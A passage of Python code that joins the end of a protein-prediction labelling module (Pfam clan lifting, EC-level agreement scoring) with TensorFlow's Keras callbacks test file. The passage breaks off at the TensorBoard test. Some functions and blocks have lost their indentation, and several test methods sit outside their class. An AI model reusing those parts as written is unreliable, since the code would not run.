    decision_threshold.
  """
  return [
      frozenset(label_vocab[np.array(row) > decision_threshold])
      for row in predictions
  ]
def get_predictions_above_threshold(
    input_df,
    inferrer,
    decision_threshold,
    label_vocab = None):
  """Return df of predictions above a threshold for each sequence.

  Args:
    input_df: pd.DataFrame with columns sequence_name, sequence.
    inferrer: inferrer from a savedmodel model (see
      protein_task.MultiDiscreteLabelProteinTask) with activation_type
      'serving_default'.
    decision_threshold: float. Classes with predictions above this threshold
      will be included in the output.
    label_vocab: A numpy array with the string labels in vocab order. If
      None, will try to fetch this tensor from `inferrer`.

  Returns:
    pd.DataFrame with columns sequence_name, sequence, and predicted_label,
    where the values in column predicted_label are frozenset of labels
    that had confidences above decision_threshold.
  """
  if label_vocab is None:
    # Fall back to the vocab tensor stored in the saved model itself.
    label_vocab = inferrer.get_variable('label_vocab:0')
  with_preds = inference.predictions_for_df(input_df.copy(), inferrer)
  predicted_label_sets = filter_predictions_to_above_threshold(
      predictions=with_preds['predictions'].values,
      decision_threshold=decision_threshold,
      label_vocab=label_vocab)
  # Replace the raw confidence vectors with the thresholded label sets.
  with_preds.drop(columns=['predictions'], inplace=True)
  with_preds['predicted_label'] = predicted_label_sets
  return with_preds
def _family_and_clan_to_just_clan(
family_and_clan):
"""Converts family_and_clan to just a clan if there is one.
Args:
family_and_clan: a set of either just a family, or a family and its
associated clan.
Returns:
If family_and_clan is only a family, return family_and_clan. If
family_and_clan has a clan, only return the clan.
Raises:
ValueError if len(family_and_clan != 1 or 2.
Also raises if len(family-and_clan) == 2 and there's no clan in it.
"""
if len(family_and_clan) == 1:
return frozenset(family_and_clan)
if len(family_and_clan) == 2:
for f_or_c in family_and_clan:
if f_or_c.startswith('Pfam:CL'):
return frozenset([f_or_c])
raise ValueError('family_and_clan was length 2, but did not have a clan in '
'it. family_and_clan was {}'.format(family_and_clan))
raise ValueError('Expected either one or two values for family_and_clan. '
'Was {}'.format(family_and_clan))
def pfam_label_normalizer_to_lifted_clan(
    label_normalizer):
  """Converts label_normalizer (that may contain EC etc.) to lifted clans."""
  # Keep only Pfam entries, deep-copying values to avoid aliasing the input.
  pfam_only = {label: copy.deepcopy(parents)
               for label, parents in label_normalizer.items()
               if label.startswith('Pfam')}
  return {label: _family_and_clan_to_just_clan(parents)
          for label, parents in pfam_only.items()}
def convert_pfam_ground_truth_to_lifted_clans(
    ground_truth,
    label_normalizer):
  """Converts ground truth to only have labels that are lifted clans.

  The label normalizer may already be a lifted clan normalizer or it may be
  a non-lifted clan normalizer; either way it is converted internally.

  Args:
    ground_truth: pd.DataFrame with columns sequence_name (str),
      true_label(Set[str]).
    label_normalizer: label normalizer. This will be converted to a lifted
      clan normalizer for use internally.

  Returns:
    pd.DataFrame with columns sequence_name (str), true_label(FrozenSet[str]).
  """
  lifted_normalizer = pfam_label_normalizer_to_lifted_clan(label_normalizer)
  result = ground_truth.copy()
  result['true_label'] = result.true_label.apply(
      lambda labels: normalize_predictions(labels, lifted_normalizer))
  return result
def _ec_label_at_level(label, level):
"""Return EC label up to and including level, or nan if it's a hyphen."""
# nan is a useful value for pd.DataFrame that's used to indicate missing
# data.
label = label.replace('EC:', '')
split = label.split('.')
if split[level - 1] == '-':
return np.nan
return '.'.join(split[:level])
def ec_agreement_for_level(df,
                           level):
  """Returns agreement and disagreement between predictions and truth.

  Computes agreement, disagreement, and no-calls between true labels and
  predicted labels at level 1, 2, 3, or 4 in the EC hierarchy. If the ground
  truth label has a dash at this level, the example is excluded from the
  analysis, as there is nothing to agree or disagree about. See the test for
  a more exhaustive listing of cases.

  Args:
    df: pd.DataFrame with columns 'true_label' (str) and 'predicted_label'
      (str). It's assumed that the input proteins are single-function
      enzymes, and that true and predicted label are the most specific
      predictions available (e.g. EC:1.2.3.4 instead of EC:1.2.3.-).
    level: int between 1 and 4.

  Returns:
    tuple of ints: [agreement, disagreement, no call made].

  Raises:
    ValueError: if level is not between 1 and 4 inclusive.
  """
  if level < 1 or level > 4:
    raise ValueError(
        'Expected level to be between 1 and 4. Was {}'.format(level))
  truncate = lambda label: _ec_label_at_level(label, level)
  truth = df.true_label.apply(truncate)
  predicted = df.predicted_label.apply(truncate)
  # nan marks labels that are unspecified at this level.
  has_truth = truth.notna()
  pred_made = has_truth & predicted.notna()
  agree_numerator = sum(pred_made & (truth == predicted))
  disagree_numerator = sum(pred_made & (truth != predicted))
  no_pred_made_numerator = sum(~pred_made & has_truth)
  if (agree_numerator + disagree_numerator + no_pred_made_numerator !=
      sum(has_truth)):
    # Internal correctness check, so raise an AssertionError, not a
    # ValueError.
    error_msg = (f'Expected the sum agree_numerator + disagree_numerator + '
                 f'no_pred_made_numerator == sum(has_ground_truth_label): were '
                 f'{agree_numerator}, {disagree_numerator}, '
                 f'{no_pred_made_numerator} {sum(has_truth)}')
    raise AssertionError(error_msg)
  return agree_numerator, disagree_numerator, no_pred_made_numerator
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import csv
import os
import re
import shutil
import tempfile
import threading
import unittest
import numpy as np
from tensorflow.core.framework import summary_pb2
from tensorflow.python import keras
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import test_util
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import adam
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
# Sizes of the synthetic datasets and toy MLPs used throughout these tests;
# kept tiny so each test runs quickly.
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
class Counter(keras.callbacks.Callback):
  """Counts the number of times each callback method was run.

  Attributes:
    method_counts: dict. Contains the counts of time each callback method was
      run.
  """

  def __init__(self):
    self.method_counts = collections.defaultdict(int)
    for hook_name in ('on_batch_begin', 'on_batch_end', 'on_epoch_begin',
                      'on_epoch_end', 'on_predict_batch_begin',
                      'on_predict_batch_end', 'on_predict_begin',
                      'on_predict_end', 'on_test_batch_begin',
                      'on_test_batch_end', 'on_test_begin', 'on_test_end',
                      'on_train_batch_begin', 'on_train_batch_end',
                      'on_train_begin', 'on_train_end'):
      # Replace each hook with a wrapper that bumps its counter first.
      setattr(self, hook_name,
              self.wrap_with_counts(hook_name, getattr(self, hook_name)))

  def wrap_with_counts(self, method_name, method):
    """Returns `method` wrapped so each call increments its own counter."""

    def _counted(*args, **kwargs):
      self.method_counts[method_name] += 1
      return method(*args, **kwargs)

    return _counted
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class CallbackCountsTest(keras_parameterized.TestCase):
  """Checks how often each callback hook fires in fit/evaluate/predict."""

  def _check_counts(self, counter, expected_counts):
    """Checks that the counts registered by `counter` are those expected."""
    for method_name, expected_count in expected_counts.items():
      self.assertEqual(
          counter.method_counts[method_name],
          expected_count,
          msg='For method {}: expected {}, got: {}'.format(
              method_name, expected_count, counter.method_counts[method_name]))

  def _get_model(self):
    """Builds a small compiled two-layer binary-classification model."""
    layers = [
        keras.layers.Dense(10, activation='relu'),
        keras.layers.Dense(1, activation='sigmoid')
    ]
    model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
    model.compile(
        adam.AdamOptimizer(0.001),
        'binary_crossentropy',
        run_eagerly=testing_utils.should_run_eagerly())
    return model

  def test_callback_hooks_are_called_in_fit(self):
    x, y = np.ones((10, 10)), np.ones((10, 1))
    val_x, val_y = np.ones((4, 10)), np.ones((4, 1))
    model = self._get_model()
    counter = Counter()
    model.fit(
        x,
        y,
        validation_data=(val_x, val_y),
        batch_size=2,
        epochs=5,
        callbacks=[counter])
    # Expected counts follow from the literals above: 10 samples with
    # batch_size 2 -> 5 train batches per epoch, over 5 epochs -> 25; the
    # 4 validation samples -> 2 test batches per epoch -> 10 total.
    self._check_counts(
        counter, {
            'on_batch_begin': 25,
            'on_batch_end': 25,
            'on_epoch_begin': 5,
            'on_epoch_end': 5,
            'on_predict_batch_begin': 0,
            'on_predict_batch_end': 0,
            'on_predict_begin': 0,
            'on_predict_end': 0,
            'on_test_batch_begin': 10,
            'on_test_batch_end': 10,
            'on_test_begin': 5,
            'on_test_end': 5,
            'on_train_batch_begin': 25,
            'on_train_batch_end': 25,
            'on_train_begin': 1,
            'on_train_end': 1
        })

  def test_callback_hooks_are_called_in_evaluate(self):
    x, y = np.ones((10, 10)), np.ones((10, 1))
    model = self._get_model()
    counter = Counter()
    model.evaluate(x, y, batch_size=2, callbacks=[counter])
    # 10 samples with batch_size 2 -> 5 evaluation batches.
    self._check_counts(
        counter, {
            'on_test_batch_begin': 5,
            'on_test_batch_end': 5,
            'on_test_begin': 1,
            'on_test_end': 1
        })

  def test_callback_hooks_are_called_in_predict(self):
    x = np.ones((10, 10))
    model = self._get_model()
    counter = Counter()
    model.predict(x, batch_size=2, callbacks=[counter])
    # 10 samples with batch_size 2 -> 5 prediction batches.
    self._check_counts(
        counter, {
            'on_predict_batch_begin': 5,
            'on_predict_batch_end': 5,
            'on_predict_begin': 1,
            'on_predict_end': 1
        })

  def test_callback_list_methods(self):
    counter = Counter()
    callback_list = keras.callbacks.CallbackList([counter])
    batch = 0
    callback_list.on_test_batch_begin(batch)
    callback_list.on_test_batch_end(batch)
    callback_list.on_predict_batch_begin(batch)
    callback_list.on_predict_batch_end(batch)
    # Each CallbackList method call should reach the callback exactly once.
    self._check_counts(
        counter, {
            'on_test_batch_begin': 1,
            'on_test_batch_end': 1,
            'on_predict_batch_begin': 1,
            'on_predict_batch_end': 1
        })
class KerasCallbacksTest(test.TestCase):
  def test_ModelCheckpoint(self):
    """Exercises ModelCheckpoint across monitor/mode/save_best_only/period."""
    if h5py is None:
      return  # Skip test if models cannot be saved.
    with self.cached_session():
      np.random.seed(1337)
      temp_dir = self.get_temp_dir()
      self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
      filepath = os.path.join(temp_dir, 'checkpoint.h5')
      (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
          train_samples=TRAIN_SAMPLES,
          test_samples=TEST_SAMPLES,
          input_shape=(INPUT_DIM,),
          num_classes=NUM_CLASSES)
      y_test = keras.utils.to_categorical(y_test)
      y_train = keras.utils.to_categorical(y_train)
      # case 1: save every epoch, mode inferred ('auto') from val_loss.
      monitor = 'val_loss'
      save_best_only = False
      mode = 'auto'
      model = keras.models.Sequential()
      model.add(
          keras.layers.Dense(
              NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
      model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
      model.compile(
          loss='categorical_crossentropy',
          optimizer='rmsprop',
          metrics=['accuracy'])
      cbks = [
          keras.callbacks.ModelCheckpoint(
              filepath,
              monitor=monitor,
              save_best_only=save_best_only,
              mode=mode)
      ]
      model.fit(
          x_train,
          y_train,
          batch_size=BATCH_SIZE,
          validation_data=(x_test, y_test),
          callbacks=cbks,
          epochs=1,
          verbose=0)
      # One epoch with save_best_only=False must produce the file.
      assert os.path.exists(filepath)
      os.remove(filepath)
      # case 2: explicit 'min' mode for val_loss.
      mode = 'min'
      cbks = [
          keras.callbacks.ModelCheckpoint(
              filepath,
              monitor=monitor,
              save_best_only=save_best_only,
              mode=mode)
      ]
      model.fit(
          x_train,
          y_train,
          batch_size=BATCH_SIZE,
          validation_data=(x_test, y_test),
          callbacks=cbks,
          epochs=1,
          verbose=0)
      assert os.path.exists(filepath)
      os.remove(filepath)
      # case 3: explicit 'max' mode with an accuracy-style metric.
      mode = 'max'
      monitor = 'val_acc'
      cbks = [
          keras.callbacks.ModelCheckpoint(
              filepath,
              monitor=monitor,
              save_best_only=save_best_only,
              mode=mode)
      ]
      model.fit(
          x_train,
          y_train,
          batch_size=BATCH_SIZE,
          validation_data=(x_test, y_test),
          callbacks=cbks,
          epochs=1,
          verbose=0)
      assert os.path.exists(filepath)
      os.remove(filepath)
      # case 4: only save when the monitored metric improves.
      save_best_only = True
      cbks = [
          keras.callbacks.ModelCheckpoint(
              filepath,
              monitor=monitor,
              save_best_only=save_best_only,
              mode=mode)
      ]
      model.fit(
          x_train,
          y_train,
          batch_size=BATCH_SIZE,
          validation_data=(x_test, y_test),
          callbacks=cbks,
          epochs=1,
          verbose=0)
      assert os.path.exists(filepath)
      os.remove(filepath)
      # Case: metric not available.
      cbks = [
          keras.callbacks.ModelCheckpoint(
              filepath,
              monitor='unknown',
              save_best_only=True)
      ]
      model.fit(
          x_train,
          y_train,
          batch_size=BATCH_SIZE,
          validation_data=(x_test, y_test),
          callbacks=cbks,
          epochs=1,
          verbose=0)
      # File won't be written.
      assert not os.path.exists(filepath)
      # case 5: with period=2 over 4 epochs, only epochs 2 and 4 are saved.
      save_best_only = False
      period = 2
      mode = 'auto'
      filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
      cbks = [
          keras.callbacks.ModelCheckpoint(
              filepath,
              monitor=monitor,
              save_best_only=save_best_only,
              mode=mode,
              period=period)
      ]
      model.fit(
          x_train,
          y_train,
          batch_size=BATCH_SIZE,
          validation_data=(x_test, y_test),
          callbacks=cbks,
          epochs=4,
          verbose=1)
      assert os.path.exists(filepath.format(epoch=2))
      assert os.path.exists(filepath.format(epoch=4))
      os.remove(filepath.format(epoch=2))
      os.remove(filepath.format(epoch=4))
      assert not os.path.exists(filepath.format(epoch=1))
      assert not os.path.exists(filepath.format(epoch=3))
      # Invalid use: this will raise a warning but not an Exception.
      keras.callbacks.ModelCheckpoint(
          filepath,
          monitor=monitor,
          save_best_only=save_best_only,
          mode='unknown')
  def test_EarlyStopping(self):
    """Smoke-tests EarlyStopping across (mode, monitor) combinations."""
    with self.cached_session():
      np.random.seed(123)
      (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
          train_samples=TRAIN_SAMPLES,
          test_samples=TEST_SAMPLES,
          input_shape=(INPUT_DIM,),
          num_classes=NUM_CLASSES)
      y_test = keras.utils.to_categorical(y_test)
      y_train = keras.utils.to_categorical(y_train)
      model = testing_utils.get_small_sequential_mlp(
          num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
      model.compile(
          loss='categorical_crossentropy',
          optimizer='rmsprop',
          metrics=['accuracy'])
      # (mode, monitor) pairs; the last pair uses unrecognized values —
      # presumably exercising the warning fallback (TODO confirm).
      cases = [
          ('max', 'val_acc'),
          ('min', 'val_loss'),
          ('auto', 'val_acc'),
          ('auto', 'loss'),
          ('unknown', 'unknown')
      ]
      for mode, monitor in cases:
        patience = 0
        cbks = [
            keras.callbacks.EarlyStopping(
                patience=patience, monitor=monitor, mode=mode)
        ]
        model.fit(
            x_train,
            y_train,
            batch_size=BATCH_SIZE,
            validation_data=(x_test, y_test),
            callbacks=cbks,
            epochs=5,
            verbose=0)
  def test_EarlyStopping_reuse(self):
    """A single EarlyStopping instance should be reusable across fits."""
    with self.cached_session():
      np.random.seed(1337)
      patience = 3
      data = np.random.random((100, 1))
      labels = np.where(data > 0.5, 1, 0)
      model = keras.models.Sequential((keras.layers.Dense(
          1, input_dim=1, activation='relu'), keras.layers.Dense(
              1, activation='sigmoid'),))
      model.compile(
          optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
      # Snapshot initial weights so the second fit restarts from scratch.
      weights = model.get_weights()
      stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
      hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
      assert len(hist.epoch) >= patience
      # This should allow training to go for at least `patience` epochs
      model.set_weights(weights)
      hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
      assert len(hist.epoch) >= patience
  def test_EarlyStopping_with_baseline(self):
    """EarlyStopping with `baseline` set, with and without patience."""
    with self.cached_session():
      np.random.seed(1337)
      baseline = 0.5
      (data, labels), _ = testing_utils.get_test_data(
          train_samples=100,
          test_samples=50,
          input_shape=(1,),
          num_classes=NUM_CLASSES)
      model = testing_utils.get_small_sequential_mlp(
          num_hidden=1, num_classes=1, input_dim=1)
      model.compile(
          optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
      # Without patience, training is expected to stop after one epoch.
      stopper = keras.callbacks.EarlyStopping(monitor='acc',
                                              baseline=baseline)
      hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
      assert len(hist.epoch) == 1
      # With patience, training must survive at least `patience` epochs.
      patience = 3
      stopper = keras.callbacks.EarlyStopping(monitor='acc',
                                              patience=patience,
                                              baseline=baseline)
      hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
      assert len(hist.epoch) >= patience
  def test_EarlyStopping_final_weights_when_restoring_model_weights(self):
    """With restore_best_weights=True the best epoch's weights are restored."""

    class DummyModel(object):
      # Minimal stand-in for a model: "weights" is just the epoch number,
      # so the restored weights identify which epoch was kept.

      def __init__(self):
        self.stop_training = False
        self.weights = -1

      def get_weights(self):
        return self.weights

      def set_weights(self, weights):
        self.weights = weights

      def set_weight_to_epoch(self, epoch):
        self.weights = epoch

    early_stop = keras.callbacks.EarlyStopping(monitor='val_loss',
                                               patience=2,
                                               restore_best_weights=True)
    early_stop.model = DummyModel()
    losses = [0.2, 0.15, 0.1, 0.11, 0.12]
    # The best configuration is in the epoch 2 (loss = 0.1000).
    epochs_trained = 0
    early_stop.on_train_begin()
    for epoch in range(len(losses)):
      epochs_trained += 1
      early_stop.model.set_weight_to_epoch(epoch=epoch)
      early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
      if early_stop.model.stop_training:
        break
    # The best configuration is in epoch 2 (loss = 0.1000),
    # and while patience = 2, we're restoring the best weights,
    # so we end up at the epoch with the best weights, i.e. epoch 2
    self.assertEqual(early_stop.model.get_weights(), 2)
def test_RemoteMonitor(self):
  """Smoke-test RemoteMonitor's epoch hook against its default address."""
  if requests is None:
    # Consistency fix: report a skip (as test_RemoteMonitorWithJsonPayload
    # does) instead of silently passing when `requests` is unavailable.
    self.skipTest('`requests` required to run this test')
  monitor = keras.callbacks.RemoteMonitor()
  # This will raise a warning since the default address is unreachable:
  monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
  """LearningRateScheduler supports 1-arg (epoch) and 2-arg (epoch, lr) fns."""
  with self.cached_session():
    np.random.seed(1337)
    (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
        train_samples=TRAIN_SAMPLES,
        test_samples=TEST_SAMPLES,
        input_shape=(INPUT_DIM,),
        num_classes=NUM_CLASSES)
    y_test = keras.utils.to_categorical(y_test)
    y_train = keras.utils.to_categorical(y_train)
    model = testing_utils.get_small_sequential_mlp(
        num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
    model.compile(
        loss='categorical_crossentropy',
        optimizer='sgd',
        metrics=['accuracy'])
    # Epoch-only schedule: lr = 1 / (1 + epoch).
    cbks = [keras.callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=5,
        verbose=0)
    # After 5 epochs the last applied lr is 1 / (1 + 4) = 0.2.
    # NOTE(review): difference is not wrapped in abs(), so this assertion
    # only bounds the error from one side.
    assert (
        float(keras.backend.get_value(
            model.optimizer.lr)) - 0.2) < keras.backend.epsilon()
    # Two-argument schedule: halve the current lr every epoch.
    cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
    model.compile(
        loss='categorical_crossentropy',
        optimizer='sgd',
        metrics=['accuracy'])
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=2,
        verbose=0)
    # SGD's default lr (0.01) halved twice -> 0.01 / 4.
    assert (
        float(keras.backend.get_value(
            model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
def test_ReduceLROnPlateau(self):
  """ReduceLROnPlateau cuts lr only when val_loss stalls beyond min_delta."""
  with self.cached_session():
    np.random.seed(1337)
    (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
        train_samples=TRAIN_SAMPLES,
        test_samples=TEST_SAMPLES,
        input_shape=(INPUT_DIM,),
        num_classes=NUM_CLASSES)
    y_test = keras.utils.to_categorical(y_test)
    y_train = keras.utils.to_categorical(y_train)

    def make_model():
      """Build a freshly re-seeded small MLP with SGD(lr=0.1)."""
      random_seed.set_random_seed(1234)
      np.random.seed(1337)
      model = testing_utils.get_small_sequential_mlp(
          num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
      model.compile(
          loss='categorical_crossentropy',
          optimizer=keras.optimizers.SGD(lr=0.1))
      return model

    model = make_model()
    # This should reduce the LR after the first epoch (due to high epsilon).
    # min_delta=10 can never be met, so lr 0.1 is multiplied by factor=0.1
    # once, then cooldown=5 prevents further reductions within 5 epochs.
    cbks = [
        keras.callbacks.ReduceLROnPlateau(
            monitor='val_loss',
            factor=0.1,
            min_delta=10,
            patience=1,
            cooldown=5)
    ]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=5,
        verbose=0)
    self.assertAllClose(
        float(keras.backend.get_value(model.optimizer.lr)),
        0.01,
        atol=1e-4)

    model = make_model()
    # min_delta=0: any improvement counts, so the lr stays at 0.1.
    cbks = [
        keras.callbacks.ReduceLROnPlateau(
            monitor='val_loss',
            factor=0.1,
            min_delta=0,
            patience=1,
            cooldown=5)
    ]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=5,
        verbose=2)
    self.assertAllClose(
        float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
  """The lr is reduced only once the monitored value stalls past patience."""

  class DummyOptimizer(object):
    """Optimizer stub exposing only an `lr` backend variable."""

    def __init__(self):
      self.lr = keras.backend.variable(1.0)

  class DummyModel(object):
    """Model stub that carries the dummy optimizer."""

    def __init__(self):
      self.optimizer = DummyOptimizer()

  reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
      monitor='val_loss', patience=2)
  reduce_on_plateau.model = DummyModel()

  # Loss improves once, then stalls for two epochs (== patience).
  losses = [0.0860, 0.1096, 0.1040]
  lrs = []
  for epoch, loss in enumerate(losses):
    reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': loss})
    lrs.append(
        keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))

  # The learning rates should be 1.0 except the last one.
  for lr in lrs[:-1]:
    self.assertEqual(lr, 1.0)
  self.assertLess(lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
  """The deprecated `epsilon` kwarg maps onto `min_delta` with a warning."""
  with test.mock.patch.object(logging, 'warning') as mock_log:
    reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
    # A deprecation warning must have been logged during construction.
    self.assertRegexpMatches(
        str(mock_log.call_args), '`epsilon` argument is deprecated')
  # The value is carried over to min_delta; no epsilon attribute remains.
  self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
  self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
  self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
def test_CSVLogger(self):
  """CSVLogger: custom separator, append mode, and callback-object reuse."""
  with self.cached_session():
    np.random.seed(1337)
    temp_dir = self.get_temp_dir()
    self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
    filepath = os.path.join(temp_dir, 'log.tsv')
    sep = '\t'
    (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
        train_samples=TRAIN_SAMPLES,
        test_samples=TEST_SAMPLES,
        input_shape=(INPUT_DIM,),
        num_classes=NUM_CLASSES)
    y_test = keras.utils.to_categorical(y_test)
    y_train = keras.utils.to_categorical(y_train)

    def make_model():
      """Build a freshly-seeded small MLP compiled with SGD(lr=0.1)."""
      np.random.seed(1337)
      model = testing_utils.get_small_sequential_mlp(
          num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
      model.compile(
          loss='categorical_crossentropy',
          optimizer=keras.optimizers.SGD(lr=0.1),
          metrics=['accuracy'])
      return model

    # case 1, create new file with defined separator
    model = make_model()
    cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=1,
        verbose=0)
    assert os.path.exists(filepath)
    with open(filepath) as csvfile:
      # The csv sniffer must detect the custom (tab) delimiter.
      dialect = csv.Sniffer().sniff(csvfile.read())
      assert dialect.delimiter == sep
    del model
    del cbks

    # case 2, append data to existing file, skip header
    model = make_model()
    cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=1,
        verbose=0)

    # case 3, reuse of CSVLogger object
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=2,
        verbose=0)

    with open(filepath) as csvfile:
      list_lines = csvfile.readlines()
      # Each row has 5 columns (4 separators).
      for line in list_lines:
        assert line.count(sep) == 4
      # Header + 4 data rows: 1 epoch (case 1) + 1 (case 2) + 2 (case 3).
      assert len(list_lines) == 5
      output = ' '.join(list_lines)
      # Append mode must not duplicate the 'epoch' header line.
      assert len(re.findall('epoch', output)) == 1
    os.remove(filepath)
def test_stop_training_csv(self):
  # Test that using the CSVLogger callback with the TerminateOnNaN callback
  # does not result in invalid CSVs.
  np.random.seed(1337)
  tmpdir = self.get_temp_dir()
  self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
  with self.cached_session():
    fp = os.path.join(tmpdir, 'test.csv')
    (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
        train_samples=TRAIN_SAMPLES,
        test_samples=TEST_SAMPLES,
        input_shape=(INPUT_DIM,),
        num_classes=NUM_CLASSES)
    y_test = keras.utils.to_categorical(y_test)
    y_train = keras.utils.to_categorical(y_train)
    cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
    model = keras.models.Sequential()
    for _ in range(5):
      model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
    model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
    model.compile(loss='mean_squared_error',
                  optimizer='rmsprop')

    def data_generator():
      """Yield real batches; switch to all-NaN batches once the running
      batch count exceeds 3 * len(x_train), to trigger TerminateOnNaN."""
      i = 0
      max_batch_index = len(x_train) // BATCH_SIZE
      tot = 0
      while 1:
        if tot > 3 * len(x_train):
          yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
                 np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
        else:
          yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
                 y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
        i += 1
        tot += 1
        i %= max_batch_index

    history = model.fit_generator(data_generator(),
                                  len(x_train) // BATCH_SIZE,
                                  validation_data=(x_test, y_test),
                                  callbacks=cbks,
                                  epochs=20)
    loss = history.history['loss']
    # Training ran for a while, then was cut short by a non-finite loss.
    assert len(loss) > 1
    assert loss[-1] == np.inf or np.isnan(loss[-1])
    values = []
    with open(fp) as f:
      for x in csv.reader(f):
        # In windows, due to \r\n line ends we may end up reading empty lines
        # after each line. Skip empty lines.
        if x:
          values.append(x)
    assert 'nan' in values[-1], 'The last epoch was not logged.'
def test_TerminateOnNaN(self):
  """TerminateOnNaN stops training at the first non-finite loss."""
  with self.cached_session():
    np.random.seed(1337)
    (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
        train_samples=TRAIN_SAMPLES,
        test_samples=TEST_SAMPLES,
        input_shape=(INPUT_DIM,),
        num_classes=NUM_CLASSES)
    y_test = keras.utils.to_categorical(y_test)
    y_train = keras.utils.to_categorical(y_train)
    cbks = [keras.callbacks.TerminateOnNaN()]
    model = keras.models.Sequential()
    # Huge constant initializers make the loss overflow immediately.
    initializer = keras.initializers.Constant(value=1e5)
    for _ in range(5):
      model.add(
          keras.layers.Dense(
              2,
              input_dim=INPUT_DIM,
              activation='relu',
              kernel_initializer=initializer))
    model.add(keras.layers.Dense(NUM_CLASSES))
    model.compile(loss='mean_squared_error', optimizer='rmsprop')
    history = model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=20)
    loss = history.history['loss']
    # Despite epochs=20, only one (infinite-loss) epoch is recorded.
    self.assertEqual(len(loss), 1)
    self.assertEqual(loss[0], np.inf)
@test_util.run_deprecated_v1
def test_TensorBoard(self):
  """Exercise the TensorBoard callback across fit() and fit_generator()."""
  np.random.seed(1337)
  temp_dir = self.get_temp_dir()
